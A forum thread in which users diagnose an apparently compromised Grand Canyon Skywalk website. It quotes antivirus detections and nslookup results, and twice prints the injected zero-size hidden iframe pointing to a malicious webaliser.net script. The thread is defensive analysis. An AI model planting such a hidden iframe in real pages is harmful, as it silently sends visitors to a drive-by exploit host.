Broadband Tech > Security > Security > Malware on grandcanyonskywalk.com or FP?

Malware on grandcanyonskywalk.com or FP?

I see 3 scripts from webaliser.net that want to run. Not running them, though.
--
My dog walks on water.

reply to Its a Secret
Firefox 3.5 says it "cannot initialize site". It never trys to load.

reply to Its a Secret
Of course, using Avast, I got the same warning for which I naturally aborted the connection.

reply to beefcake122

reply to Its a Secret
The Proxomitron blocks the scripts there. I get a blank page on Fx3 with a toggle switch in the center of the page for Flash. Evidently the site is entirely behind Flash. I don't have Flash Player and I don't think Proxo blocking a script would make the page entirely blank. Bypassing Proxo also gets me a blank page with an icon to download Flash Player.
--
"The same ferocity that our founders devoted to protect the freedom and independence of the press is now appropriate for our defense of the freedom of the internet. The stakes are the same: the survival of our Republic". Al Gore, The Assault on Reason

reply to Its a Secret
Yes, the webaliser iframe is a known attack. Currently webaliser.net is down, so it's not serving up any actual exploits, but the grandcanyonskywalk.com server is definitely compromised and needs fixing.

(Note: the real Webalizer domain is spelled with a 'z'.)

reply to Its a Secret
Anyone reported this to them
--
GuruGuy

reply to Its a Secret
I get this from avira:

Requested URL: www.grandcanyonskywalk.com/mainmenu.html
Information Contains recognition pattern of the HTML/Infected.WebPage.Gen HTML script virus
--
GuruGuy

reply to Its a Secret
Fx v3.5.1 says it "Can not initialize."
--
"Facts not FUD!"

I am also running Avira but

when i loaded that page, the HAVP(Http Antivirus proxy) running ClamAV on my pfsense box(which scans all traffic passing though my pfsense box with clamav) threw up this warning before Avira even got a chance to do anything

"This page was blocked because it contained the following virus: PUA JS.Obfus-2

So I would say its infected...

reply to GuruGuy
I see I will check it out later then with the manual input.
Thanks.
--
"Facts not FUD!"

reply to GuruGuy
Yes, I did fire off an email referencing this thread to them.

reply to Its a Secret
Has been fixed or something. I cant seem to find any problems.

No, it's still there.

<iframe src="http://webaliser.net/statistic/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>
 
 

webhost:/ # nslookup webaliser.net
Server:         192.168.10.1
Address:        192.168.10.1#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # nslookup webaliser.net 68.94.156.1
Server:         68.94.156.1
Address:        68.94.156.1#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # nslookup webaliser.net 208.67.222.222
Server:         208.67.222.222
Address:        208.67.222.222#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # ping webaliser.net
ping: unknown host webaliser.net
 

reply to Grail Knight
Interesting stuff here.. Tried at home with KAV and IE 8.. get similar results.. At work with Norton... site opens right up in IE 6.. hmmm
--
da Cajun Darn I hate Malware

reply to NetFixer

<iframe src="http://webaliser.net/statistic/out.php?s_id=1" width="0" height="0" frameborder="0"></iframe>
 
 

webhost:/ # nslookup webaliser.net
Server:         192.168.10.1
Address:        192.168.10.1#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # nslookup webaliser.net 68.94.156.1
Server:         68.94.156.1
Address:        68.94.156.1#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # nslookup webaliser.net 208.67.222.222
Server:         208.67.222.222
Address:        208.67.222.222#53

** server can't find webaliser.net: SERVFAIL

webhost:/ # ping webaliser.net
ping: unknown host webaliser.net
 

reply to CajunTek